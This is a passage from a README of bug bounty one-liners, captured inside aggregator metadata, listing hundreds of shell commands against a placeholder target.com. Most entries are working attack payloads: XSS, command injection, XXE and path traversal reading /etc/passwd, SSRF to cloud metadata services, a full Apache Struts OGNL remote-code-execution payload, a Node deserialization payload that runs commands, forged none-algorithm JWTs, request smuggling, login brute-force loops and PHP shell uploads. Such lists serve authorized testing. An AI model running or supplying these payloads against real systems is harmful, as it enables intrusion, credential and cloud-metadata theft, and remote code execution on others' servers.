magento_admin_exposed.txt\n```\n\nCheck for SSRF by Detecting Response Based Redirects\n```bash\ncat subdomains.txt | httpx -silent -H \"X-Forwarded-For: attacker.com\" -fr 'Location: attacker.com' -o ssrf_possible.txt\n```\n\nDetect Exposed Env Files (.env with Secrets)\n```bash\ncat subdomains.txt | httpx -silent -path /.env -mc 200 -o exposed_env_files.txt\n```\n\nFind XMLRPC Enabled on WordPress (Brute Force Vector)\n```bash\ncat subdomains.txt | httpx -silent -path /xmlrpc.php -mc 200 -o wordpress_xmlrpc.txt\n```\n\nIdentify Open Kibana Dashboards (Sensitive Logs)\n```bash\ncat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o open_kibana.txt\n```\n\nFind Servers Exposing phpinfo() (Sensitive Config)\n```bash\ncat subdomains.txt | httpx -silent -path /phpinfo.php -mc 200 -o phpinfo_exposed.txt\n```\n\nDetect Publicly Accessible Swagger APIs\n```bash\ncat subdomains.txt | httpx -silent -path /swagger-ui/ -mc 200 -o swagger_exposed.txt\n```\n\nSearch for SQL Dumps and Backup Files (db.sql/db.zip)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/db.sql\\n/backup.sql\\n/database.sql') -mc 200 -o sql_dumps_exposed.txt\n```\n\nDetect LFI Points (path traversal)\n```bash\ncat subdomains.txt | gf lfi | httpx -silent -o lfi_possible_urls.txt\n```\n\nIdentify Reflected XSS via GET Parameters\n```bash\ncat subdomains.txt | gf xss | qsreplace '\"\u003e\u003cimg src=x onerror=alert(document.domain)\u003e' | httpx -silent -fr '\"\u003e\u003cimg src=x onerror=alert' -o reflected_xss.txt\n```\n\nFind Outdated WordPress Versions (Vuln Detection)\n```bash\ncat subdomains.txt | httpx -silent -path /readme.html -mc 200 -o wordpress_readme.txt\n```\n\nSearch for PHPMyAdmin Exposed Panels\n```bash\ncat subdomains.txt | httpx -silent -path /phpmyadmin -mc 200 -o phpmyadmin_exposed.txt\n```\n\nDetect Command Injection Points\n```bash\ncat subdomains.txt | gf command-injection | qsreplace ';id' | httpx -silent -fr 'uid=' -o cmd_injection.txt\n```\n\nFind Exposed Docker Daemon API (Remote Control)\n```bash\nnaabu -list subdomains.txt -p 2375 -silent | httpx -silent -o docker_api_exposed.txt\n```\n\nIdentify Open Git Directories (.git Exposed)\n```bash\ncat subdomains.txt | httpx -silent -path /.git/config -mc 200 -o git_dirs_exposed.txt\n```\n\nScan for Exposed Server Status Pages (Apache/Nginx)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/server-status\\n/nginx-status') -mc 200 -o server_status_exposed.txt\n```\n\nDetect Open Jenkins Panels with Script Console\n```bash\ncat subdomains.txt | httpx -silent -path /script -mc 200 -o jenkins_script_console.txt\n```\n\nFind Exposed AWS S3 Buckets via Subdomains\n```bash\ncat subdomains.txt | nuclei -t s3-detect.yaml -o open_s3_buckets.txt\n```\n\nSearch for Potential Open Redirects (Unsafe Redirects)\n```bash\ncat subdomains.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirects.txt\n```\n\nFind Debug/Error Pages (Sensitive Stacktrace)\n```bash\ncat subdomains.txt | httpx -silent -sc -fr 'error\\|exception\\|trace' -o error_pages.txt\n```\n\nDetect Exposed Jenkins API Endpoints\n```bash\ncat subdomains.txt | httpx -silent -path /api/json -mc 200 -o jenkins_api_exposed.txt\n```\n\nFind Exposed Kubernetes Dashboard (Cluster Control)\n```bash\ncat subdomains.txt | httpx -silent -path /api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/ -mc 200 -o k8s_dashboard_exposed.txt\n```\n\nDetect SSRF via Open Redirect Chains\n```bash\ncat subdomains.txt | gf ssrf | qsreplace 'http://169.254.169.254/latest/meta-data/' | httpx -silent -fr 'ami-id\\|instance-id' -o ssrf_exploitable.txt\n```\n\nLook for Backup or Archive Files (tar.gz, zip)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/backup.tar.gz\\n/site-backup.zip') -mc 200 -o backup_files_exposed.txt\n```\n\nIdentify Known Vulnerable CMS Versions\n```bash\nnuclei -l subdomains.txt -t cves/ -o cms_cve_vulns.txt\n```\n\nFind JWT Tokens or Sensitive Tokens in Responses\n```bash\ncat subdomains.txt | httpx -silent -sr | grep -Eo 'eyJ[^\"]+' | tee jwt_tokens.txt\n```\n\nDetect Basic Auth Protected Pages (Bruteforce Target)\n```bash\ncat subdomains.txt | httpx -silent -sc -H \"Authorization: Basic fakeauth\" -o basic_auth_detected.txt\n```\n\nDetect Exposed .git Repositories (Full Source Code Leak)\n```bash\ncat subdomains.txt | httpx -silent -path /.git/config -mc 200 -o exposed_git_repos.txt\n```\n\nFind Public .DS_Store Files (Directory Listing Exposure)\n```bash\ncat subdomains.txt | httpx -silent -path /.DS_Store -mc 200 -o ds_store_exposed.txt\n```\n\nScan for Exposed .svn Repos (Source Code Leak)\n```bash\ncat subdomains.txt | httpx -silent -path /.svn/entries -mc 200 -o svn_repos_exposed.txt\n```\n\nFind Open GraphQL Endpoints (GraphQL Injection)\n```bash\ncat subdomains.txt | httpx -silent -path /graphql -mc 200 -o graphql_exposed.txt\n```\n\nDetect Exposed Laravel Debug Pages (Full App Secrets)\n```bash\ncat subdomains.txt | httpx -silent -path /_ignition/health-check -mc 200 -o laravel_debug_exposed.txt\n```\n\nCheck for File Upload Points (RCE Chances)\n```bash\ncat subdomains.txt | gf upload | httpx -silent -o file_upload_points.txt\n```\n\nFind XML External Entity (XXE) Injection Points\n```bash\ncat subdomains.txt | gf xxe | qsreplace 'file:///etc/passwd' | httpx -silent -fr 'root:x' -o xxe_exploitable.txt\n```\n\nDetect Misconfigured AWS Cognito Pools (Token Takeover)\n```bash\ncat subdomains.txt | nuclei -t misconfiguration/cognito-detect.yaml -o aws_cognito_misconfig.txt\n```\n\nScan for Open Cloud Storage Buckets (GCP/Azure)\n```bash\ncat subdomains.txt | nuclei -t exposed-storage/ -o cloud_buckets_exposed.txt\n```\n\nFind Sensitive Files via URL Fuzzing\n```bash\nffuf -u FUZZ -w wordlists/sensitive-files.txt -mc 200 -o sensitive_files_found.txt\n```\n\nDetect Open Prometheus Panels (Monitoring Exposure)\n```bash\ncat subdomains.txt | httpx -silent -path /graph -mc 200 -o prometheus_exposed.txt\n```\n\nFind Open Redirection in APIs\n```bash\ncat subdomains.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirects_apis.txt\n```\n\nDetect Misconfigured CORS (Any Origin Allowed)\n```bash\ncat subdomains.txt | httpx -silent -H \"Origin: https://evil.com\" -fr \"access-control-allow-origin: https://evil.com\" -o misconfigured_cors.txt\n```\n\nDetect Backup Archives (Zip/Tar Files)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/backup.zip\\n/backup.tar.gz\\n/site-backup.zip') -mc 200 -o backup_archives_found.txt\n```\n\nFind Exposed Debug Logs (Stack Traces, Errors)\n```bash\ncat subdomains.txt | httpx -silent -path /debug.log -mc 200 -o debug_logs_exposed.txt\n```\n\nScan for SSRF via Parameter Fuzzing\n```bash\ncat subdomains.txt | gf ssrf | qsreplace 'http://169.254.169.254/latest/meta-data/' | httpx -silent -fr 'ami-id\\|instance-id' -o ssrf_targets.txt\n```\n\nIdentify Server Headers for Misconfig Analysis\n```bash\ncat subdomains.txt | httpx -silent -sc -H 'X-Check: true' -o headers_info.txt\n```\n\nDetect Missing Security Headers (Hardening Issues)\n```bash\ncat subdomains.txt | nuclei -t security-misconfiguration/ -o missing_security_headers.txt\n```\n\nFind Exposed WordPress Debug Logs\n```bash\ncat subdomains.txt | httpx -silent -path /wp-content/debug.log -mc 200 -o wordpress_debug_log.txt\n```\n\nDetect Exposed GITLAB CI Files (Pipeline Secrets)\n```bash\ncat subdomains.txt | httpx -silent -path /.gitlab-ci.yml -mc 200 -o gitlab_ci_exposed.txt\n```\n\nFind API Keys Leaked in JS Files\n```bash\nkatana -list subdomains.txt -silent -js | grep -E 'apiKey|client_secret|access_token' -o api_keys_leaked.txt\n```\n\nDetect Old PHPMyAdmin Panels (Known Vulns)\n```bash\ncat subdomains.txt | httpx -silent -path /phpmyadmin/ -mc 200 -o phpmyadmin_found.txt\n```\n\nIdentify Exposed Kibana Panels (Log Monitoring)\n```bash\ncat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o kibana_panels_exposed.txt\n```\n\nScan for Path Traversal (../../etc/passwd)\n```bash\ncat subdomains.txt | gf lfi | qsreplace '../../etc/passwd' | httpx -silent -fr 'root:x' -o path_traversal_found.txt\n```\n\nFind Open Admin Panels (Unprotected Login)\n```bash\ncat subdomains.txt | nuclei -t exposed-panels/ -o admin_panels_exposed.txt\n```\n\nDetect Known CVEs via Nuclei (Automated Vuln Scan)\n```bash\nnuclei -l subdomains.txt -t cves/ -o known_cves_found.txt\n```\n\nIdentify Unsafe Redirects (via Location Header)\n```bash\ncat subdomains.txt | httpx -silent -sc -o redirects.txt \u0026\u0026 cat redirects.txt | grep 'Location:' | grep -i 'http'\n```\n\nFind Kubernetes Dashboard Exposures\n```bash\ncat subdomains.txt | httpx -silent -path /api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/ -mc 200 -o k8s_dashboard_exposed.txt\n```\n\nExposed Swagger / API Documentation \n```bash\ncurl -s https://target.com/swagger.json\n```\n\nAdmin Panel Discovery (CMS Detection) \n```bash\ncurl -s https://target.com/admin/ | grep -i 'cms'\n```\n\nGCP Metadata SSRF Check \n```bash\ncurl \"https://target.com/?url=http://metadata.google.internal/computeMetadata/v1/ -H 'Metadata-Flavor: Google'\"\n```\n\nAzure Metadata Leak via SSRF \n```bash\ncurl \"https://target.com/?url=http://169.254.169.254/metadata/instance?api-version=2021-01-01\" -H \"Metadata: true\"\n```\n\nOAuth Token Leak in Referrer \n```bash\ncurl -I https://target.com/oauth/callback?code=abcd1234\n```\n\nAWS Keys Hunt in Public Repos (with GitHub CLI) \n```bash\ngh search code \"AWS_ACCESS_KEY_ID\" --language python --limit 100\n```\n\nIDOR via Incrementing Document IDs \n```bash\nfor id in $(seq 1 100); do curl -s https://target.com/documents/$id; done\n```\n\nSensitive Backup File Discovery \n```bash\ncurl -I https://target.com/config.bak\n```\n\nJWT Key Disclosure via Well-Known File \n```bash\ncurl -s https://target.com/.well-known/jwks.json\n```\n\nMobile Deep Link Misconfig Check \n```bash\nadb shell am start -a android.intent.action.VIEW -d \"target://app/link?param=test\"\n```\n\nTesting Rate Limiting (Brute Force) \n```bash\nseq 1 1000 | xargs -P10 -I{} curl -X POST \"https://target.com/api/login\" -d 'user=admin\u0026password=wrong{}'\n```\n\nClient-Side Security Headers Audit \n```bash\ncurl -I https://target.com | grep -Ei 'strict-transport|content-security|x-frame'\n```\n\nSession Fixation Check \nReuse session after login/logout: \n```bash\ncurl -c cookies.txt https://target.com/login \u0026\u0026 curl -b cookies.txt https://target.com/dashboard\n```\n\nExposed Debug Endpoints \n```bash\ncurl -s https://target.com/debug/vars\n```\n\nDirect Database Query via GraphQL \n```bash\ncurl -X POST https://target.com/graphql -d '{\"query\":\"{users{username,password}}\"}'\n```\n\nDNS Zone Transfer Misconfig (AXFR) \n```bash\ndig axfr target.com @ns1.target.com\n```\n\nMisconfigured CNAME Takeover \n```bash\ndig cname subdomain.target.com\n```\n\nLFI via Parameter Tampering \n```bash\ncurl \"https://target.com/page?file=../../../../etc/passwd\"\n```\n\nWebSocket Security Check (Frame Injection) \n```bash\nwscat -c ws://target.com/socket\n```\n\nSensitive Parameter Brute Force \n```bash\ncat params.txt | xargs -I{} curl -s \"https://target.com/?{}=test\"\n```\n\nGraphQL Introspection Check \n```bash\ncurl -X POST https://target.com/graphql -d '{\"query\":\"{__schema{types{name}}}\"}'\n```\n\nPublic GitHub Secrets Hunt \n```bash\ngh search code \"api_key\" --repo target/repo\n```\n\nCSP Bypass Discovery \n```bash\ncurl -I https://target.com | grep -i content-security-policy\n```\n\nKubernetes Dashboard Exposure \n```bash\ncurl -k https://target.com/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/\n```\n\nGoogle Dorking One-Liner \n```bash\nxdg-open \"https://www.google.com/search?q=site:target.com filetype:env\"\n```\n\nFirebase Database Exposure Check \n```bash\ncurl -s https://target.firebaseio.com/.json\n```\n\nHeader Injection Test \n```bash\ncurl -I \"https://target.com/%0D%0AX-Test:evil\"\n```\n\nAWS S3 Bucket Direct List \n```bash\ncurl https://target.s3.amazonaws.com/\n```\n\nTest SSRF via Redirect \n```bash\ncurl \"https://target.com/redirect?url=http://169.254.169.254\"\n```\n\nTest Command Injection via Headers \n```bash\ncurl -H \"User-Agent: ;id\" https://target.com/\n```\n\nExposed Git Folder \n```bash\ncurl -s https://target.com/.git/config\n```\n\nGCP Storage Bucket Exposure \n```bash\ncurl -s https://storage.googleapis.com/target-bucket-name/\n```\n\nOpen Redirect Discovery \n```bash\ncurl -I \"https://target.com/redirect?url=https://evil.com\"\n```\n\nFast Path Traversal Discovery \n```bash\ncurl \"https://target.com/download?file=../../../../etc/passwd\"\n```\n\nTesting File Upload Handling \n```bash\ncurl -F \"file=@/etc/passwd\" https://target.com/upload\n```\n\nSubdomain Takeover Check (CNAME) \n```bash\ndig cname sub.target.com\n```\n\nCheck for Anonymous FTP Access \n```bash\nftp target.com\n```\n\nBackup Files Finder \n```bash\ncurl -I https://target.com/index.php.bak\n```\n\nCloudFront Misconfiguration Detection \n```bash\ncurl -I https://target.cloudfront.net\n```\n\nPublic Trello/Slack Links in Code \n```bash\ngh search code \"trello.com/b/\" --repo target/repo\n```\n\nEmail Spoofing via Misconfigured SPF \n```bash\ndig txt target.com\n```\n\nWeak JWT Secret Guessing \n```bash\necho -n 'eyJhbGciOiAiSFMyNTYifQ.eyJ1c2VyIjogImFkbWluIn0' | base64 -d\n```\n\nTest for Public Firebase Storage \n```bash\ncurl -s https://target.firebaseio.com/.json\n```\n\nUnrestricted File Download (Insecure Direct Object Reference) \n```bash\ncurl -s https://target.com/files/1.pdf\n```\n\nDiscover Admin Portals \n```bash\ngobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\n```\n\nCheck for Debug Endpoints \n```bash\ncurl -s https://target.com/debug/vars\n```\n\n**Server Header Disclosure** \n```bash\ncurl -I https://target.com | grep Server\n```\n\n**Find Exposed GitHub Actions Secrets** \n```bash\ngh api repos/target/repo/actions/secrets\n```\n\n**Test Blind XSS via User-Agent** \n```bash\ncurl -A \"\u003cscript\u003ealert(document.domain)\u003c/script\u003e\" https://target.com/\n```\n\n**Test for PHP Info Disclosure** \n```bash\ncurl -s https://target.com/phpinfo.php\n```\n\n**Exposed Kubernetes Dashboard via Proxy** \n```bash\ncurl -k https://target.com/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/\n```\n\n**GraphQL Schema Discovery** \n```bash\ncurl -X POST https://target.com/graphql -d '{\"query\":\"{__schema{types{name}}}\"}'\n```\n\n**Check for Exposed AWS Lambda Function** \n```bash\ncurl -s https://target.com/.netlify/functions/\n```\n\n**Sensitive Parameter Fuzzing** \n```bash\nffuf -u https://target.com/?FUZZ=test -w params.txt\n```\n\n**Detect Misconfigured CORS** \n```bash\ncurl -I -H \"Origin: https://evil.com\" https://target.com\n```\n\n**Check for Weak JWT Tokens (None Algorithm)** \n```bash\ncurl -s https://target.com/api -H \"Authorization: Bearer eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.\"\n```\n\n**Exposed .env Files (Sensitive Config)** \n```bash\ncurl -s https://target.com/.env\n```\n\n**Sensitive GitHub Issues (Bug Bounty Targets)** \n```bash\ngh issue list --repo target/repo --search \"security\"\n```\n\n**Exposed Internal IP Disclosure via Headers** \n```bash\ncurl -I https://target.com | grep -i 'x-originating-ip\\|x-forwarded-for'\n```\n\n**Reverse Proxy Bypass Tricks** \n```bash\ncurl -I https://target.com/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd\n```\n\n**Check for SSRF via Open Redirects** \n```bash\ncurl \"https://target.com/redirect?url=http://burpcollaborator.net\"\n```\n\n**Check for Command Injection in Parameters** \n```bash\ncurl \"https://target.com/ping?host=127.0.0.1;id\"\n```\n\n**Test for XML External Entity (XXE)** \n```bash\ncurl -X POST https://target.com/upload -d '\u003c!DOCTYPE foo [ \u003c!ENTITY xxe SYSTEM \"file:///etc/passwd\"\u003e ]\u003e\u003cfoo\u003e\u0026xxe;\u003c/foo\u003e'\n```\n\n**Test for Server-Side Template Injection (SSTI)** \n```bash\ncurl \"https://target.com/render?template={{7*7}}\"\n```\n\n**Sensitive File Leak Check (.DS_Store, .bak)** \n```bash\ncurl -I https://target.com/.DS_Store\n```\n\n**DNS Takeover Discovery** \n```bash\nhost -t cname sub.target.com\n```\n\n**Test for Misconfigured CORS (Wildcard Origin)** \n```bash\ncurl -I -H \"Origin: https://evil.com\" https://target.com\n```\n\n**Directory Traversal with Double Encoding** \n```bash\ncurl \"https://target.com/download?file=%252E%252E%252F%252E%252E%252Fetc%252Fpasswd\"\n```\n\n**Check for Exposed Configuration Files** \n```bash\ncurl -s https://target.com/wp-config.php\n```\n\n**Find Environment Variables in Responses** \n```bash\ncurl -s https://target.com | grep -E 'AWS_ACCESS_KEY|DB_PASSWORD'\n```\n\n**Check for Misconfigured Security Headers** \n```bash\ncurl -I https://target.com | grep -i \"X-Frame-Options\\|Content-Security-Policy\\|Strict-Transport-Security\"\n```\n\n**Test for Gopher SSRF** \n```bash\ncurl \"https://target.com/?url=gopher://127.0.0.1:6379/_INFO\"\n```\n\n**Open Admin Panels Discovery** \n```bash\ngobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,aspx\n```\n\n**Exposed Docker API** \n```bash\ncurl -s http://target.com:2375/containers/json\n```\n\n**Check for Log Injection** \n```bash\ncurl \"https://target.com/login?username=%0a%0dINJECTEDLOG\u0026password=test\"\n```\n\n**Test for Prototype Pollution** \n```bash\ncurl \"https://target.com/api?__proto__[polluted]=true\"\n```\n\n**Exposed Backup Files via Common Extensions** \n```bash\ncurl -I https://target.com/index.php~\n```\n\n**Check for Arbitrary File Read (Java Web Apps)** \n```bash\ncurl -s https://target.com/admin/..;/WEB-INF/web.xml\n```\n\n**Check for Error-Based SQL Injection** \n```bash\ncurl \"https://target.com/product?id=1'\"\n```\n\n**Check for Misconfigured Exposed GitLab/GitHub Pages** \n```bash\ncurl -I https://target.com/.gitlab-ci.yml\n```\n\n**Find Public S3 Buckets in JavaScript Files** \n```bash\ncurl -s https://target.com/app.js | grep \"s3.amazonaws.com\"\n```\n\n**Test for Apache Struts RCE (Legacy)** \n```bash\ncurl -X POST -H \"Content-Type: %{(#_=β€˜multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[β€˜com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=β€˜id’).(#iswin=(@java.lang.System@getProperty(β€˜os.name’).toLowerCase().contains(β€˜win’))).(#cmds=(#iswin?{β€˜cmd.exe’,β€˜/c’,#cmd}:{β€˜/bin/sh’,β€˜-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}\" https://target.com/upload.action\n```\n\n**Detect Java Deserialization (CommonsCollections)** \n```bash\ncurl -X POST -H \"Content-Type: application/x-java-serialized-object\" --data-binary @exploit.ser https://target.com/upload\n```\n\n**Exposed Jenkins Console** \n```bash\ncurl -s https://target.com/script\n```\n\n**Insecure Cookie Handling Check** \n```bash\ncurl -I https://target.com | grep -i Set-Cookie\n```\n\n### πŸ’» Ultimate Bug Bounty One-Liners - Part 4\n\n**Find API Endpoints Directly from Web Responses** \n```bash\ncurl -s https://target.com | grep -oE 'https?://[^\"]+/api/[^\"]+' | sort -u\n```\n\n**Find Hardcoded Secrets in JS Files** \n```bash\ncurl -s https://target.com/app.js | grep -E \"apikey|token|password|secret|client_id\"\n```\n\n**Detect GraphQL Endpoints Automatically** \n```bash\ncurl -I https://target.com/graphql\n```\n\n**Test for Insecure Deserialization via JSON** \n```bash\ncurl -X POST https://target.com/api/v1/process -H \"Content-Type: application/json\" -d '{\"user\":\"_$$ND_FUNC$$_function(){require(\\\"child_process\\\").exec(\\\"id\\\")}()\"}'\n```\n\n**Detect AWS Keys Leaked in Source** \n```bash\ncurl -s https://target.com/app.js | grep -E \"AKIA[0-9A-Z]{16}\"\n```\n\n**Check for Insecure Direct Object Reference (IDOR)** \n```bash\ncurl \"https://target.com/api/v1/users/1234\" -b \"session=your_cookie_here\"\n```\n*Change 1234 to 1233 or 1235 and see if you access other user data.*\n\n**Test for JWT None Algorithm Vulnerability** \n```bash\necho '{\"alg\":\"none\",\"typ\":\"JWT\"}' | base64 | tr -d '=' | tr '/+' '_-' | tr -d '\\n' | xargs -I % curl -H \"Authorization: Bearer %.eyJ1c2VyIjoiYWRtaW4ifQ.\" https://target.com/api/private\n```\n\n**Find Sensitive Pages via Archive.org** \n```bash\ncurl -s \"http://web.archive.org/cdx/search/cdx?url=*.target.com/*\u0026output=text\u0026fl=original\u0026collapse=urlkey\" | grep -E \"backup|admin|.sql|.env|.git\"\n```\nHere is the converted list:\n\n**Test for Server-Side Request Forgery (Advanced)** \n```bash\ncurl \"https://target.com/api/fetch?url=http://burpcollaborator.net\"\n```\n\n**Auto-Scan for CVEs (Nuclei FTW)** \n```bash\nnuclei -u https://target.com -t cves/\n```\n\n**Detect Prototype Pollution in Query Strings** \n```bash\ncurl \"https://target.com/api?__proto__[exploit]=polluted\"\n```\n\n**Test for Cache Poisoning** \n```bash\ncurl -H \"X-Forwarded-Host: evil.com\" https://target.com\n```\n\n**Find Misconfigured S3 Buckets via Subdomains** \n```bash\nhost -t cname files.target.com | grep amazonaws\n```\n\n**Check for HTTP Parameter Pollution (HPP)** \n```bash\ncurl \"https://target.com/login?user=admin\u0026user=guest\"\n```\n\n**Test for Open S3 Buckets Directly** \n```bash\naws s3 ls s3://target-bucket-name --no-sign-request\n```\n\n**Search for Exposed GitHub Tokens in Source** \n```bash\ncurl -s https://target.com/app.js | grep -E 'ghp_[a-zA-Z0-9]{36}'\n```\n\n**Test for Business Logic Bypass (Rate Limit)** \n```bash\nfor i in {1..100}; do curl -X POST https://target.com/api/v1/reset-password; done\n```\n\n**Detect Information Disclosure via Debug Headers** \n```bash\ncurl -I https://target.com | grep -i \"debug\\|x-powered-by\\|server\"\n```\n\n**Detect Unsafe Cross-Origin Resource Sharing (CORS)** \n```bash\ncurl -I -H \"Origin: https://evil.com\" https://target.com\n```\n\n**Auto-Find Secrets in Git Repos (GitLeaks)** \n```bash\ngitleaks detect --source=https://github.com/target/repo.git\n```\n\n**Detect Open Redirect via Path Injection** \n```bash\ncurl \"https://target.com/redirect?next=//evil.com\"\n```\n\n**Find Subdomain Takeover with Subfinder + Nuclei** \n```bash\nsubfinder -d target.com | nuclei -t takeover/\n```\n\n**Test for SOAP Injection (If SOAP API Detected)** \n```bash\ncurl -X POST https://target.com/soap -d '\u003c?xml version=\"1.0\"?\u003e\u003csoap:Envelope\u003e\u003csoap:Body\u003e\u003cexploit\u003e\u003c![CDATA[1 or 1=1]]\u003e\u003c/exploit\u003e\u003c/soap:Body\u003e\u003c/soap:Envelope\u003e'\n```\n\n**Detect Weak JWT Secrets (Bruteforce)** \n```bash\njwt-tool eyJhbGciOiJ... --brute --wordlist=/usr/share/wordlists/rockyou.txt\n```\n\n**Exposed ENV Files via .env** \n```bash\ncurl -s https://target.com/.env\n```\n\n**Check for Cloud Metadata Exposure (AWS/GCP/Azure)** \n```bash\ncurl -H \"Host: 169.254.169.254\" https://target.com\n```\n\n**Detect Command Injection via Parameter Fuzzing** \n```bash\ncurl 'https://target.com/ping?ip=127.0.0.1;id'\n```\n\n**Test for Fast Redirect Bypass (Open Redirect)** \n```bash\ncurl \"https://target.com/redirect?url=//evil.com\"\n```\n\n**Detect Path Traversal in Parameters** \n```bash\ncurl \"https://target.com/api/v1/files?path=../../../../etc/passwd\"\n```\n\n**Look for Exposed Kubernetes Dashboard** \n```bash\ncurl -I https://target.com/k8s/\n```\n\n**Find Rate Limit Issues in Password Reset API** \n```bash\nseq 1 100 | xargs -I % -P 20 curl -X POST https://target.com/api/v1/reset\n```\n\n**Test HTTP Smuggling with CRLF Injection** \n```bash\nprintf \"GET / HTTP/1.1\\r\\nHost: target.com\\r\\nTransfer-Encoding: chunked\\r\\n\\r\\n0\\r\\n\\r\\nG\\r\\n\\r\\n\" | nc target.com 80\n```\n\n**Detect Client-Side Storage Leaks (localStorage/sessionStorage)** \n```bash\ncurl -s https://target.com/app.js | grep -i \"localStorage\\|sessionStorage\"\n```\n\n**Check for Blind SSRF via PDF Generation** \n```bash\ncurl -X POST https://target.com/api/generate-pdf -d '{\"url\":\"http://your-collaborator.burpcollaborator.net\"}'\n```\n\n**Test for Misconfigured CSP (Content Security Policy)** \n```bash\ncurl -I https://target.com | grep -i \"content-security-policy\"\n```\n\n**Detect Unauthenticated Admin Panels** \n```bash\ncurl -I https://target.com/admin/\n```\n\n**Check for Web Cache Deception** \n```bash\ncurl -I https://target.com/logout.jpg\n```\n\n**Look for Backup Files Exposed** \n```bash\ncurl -I https://target.com/config.php.bak\n```\n\n**Scan for Parameter Pollution (HPP)** \n```bash\ncurl \"https://target.com/api?user=admin\u0026user=guest\"\n```\n\n**Detect JWT Injection** \n```bash\ncurl -H \"Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoibWVAdmUuY29tIn0.\" https://target.com/api/user\n```\n\n**Check for Broken Object Level Authorization (BOLA)** \n```bash\ncurl \"https://target.com/api/v1/orders/1001\" -b \"session=your-cookie\"\n```\nChange 1001 to 1002, 1003 and see if you can access others' data.\n\n**Test for Insecure Redirect via Referer Header** \n```bash\ncurl -H \"Referer: https://evil.com\" https://target.com\n```\n\n**Identify Leaked API Documentation** \n```bash\ncurl -s https://target.com/api/docs/\n```\n\n**Test for GraphQL Batch Query Abuse** \n```bash\ncurl -X POST https://target.com/graphql -d '{\"query\":\"{user(id:1) {name} user(id:2) {name} user(id:3) {name}}\"}'\n```\n\n**Find Misconfigured CORS (Advanced)** \n```bash\ncurl -I -H \"Origin: https://evil.com\" https://target.com\n```\n\n**Check for WebSockets Injection** \n```bash\nwscat -c ws://target.com/socket\n```\n\n**Search for Backup Directories in Wayback** \n```bash\ncurl -s \"http://web.archive.org/cdx/search/cdx?url=*.target.com/*\u0026output=text\u0026fl=original\u0026collapse=urlkey\" | grep -iE \"\\.bak|\\.old|\\.zip\"\n```\n\n**Find Laravel .env Exposure** \n```bash\ncurl -s https://target.com/.env\n```\n\n**Detect Exposed Debug Pages (Laravel, Symfony, etc)** \n```bash\ncurl -I https://target.com/_profiler/\n```\n\n**Check for Misconfigured Proxy Headers (IP Spoofing)** \n```bash\ncurl -H \"X-Forwarded-For: 127.0.0.1\" https://target.com/admin/\n```\n\n**Look for API Key in Mobile App Files** \n```bash\ncurl -s https://target.com/app.apk | strings | grep -i \"apikey\\|token\"\n```\n\n**Scan for WAF Bypass via Encoding** \n```bash\ncurl --path-as-is \"https://target.com/%2e%2e/%2e%2e/admin/\"\n```\n\n**Test for Host Header Injection** \n```bash\ncurl -H \"Host: evil.com\" https://target.com\n```\n\n**Look for S3 Bucket Leaks in JS** \n```bash\ncurl -s https://target.com/app.js | grep -i \"s3.amazonaws.com\"\n```\n\n**Detect File Upload Vulnerabilities** \n```bash\ncurl -F \"file=@evil.php\" https://target.com/upload\n```\n","funding_links":["https://ko-fi.com/yogsec","https://buymeacoffee.com/yogsec"],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fyogsec%2Fonelinerbounty","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fyogsec%2Fonelinerbounty","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fyogsec%2Fonelinerbounty/lists"}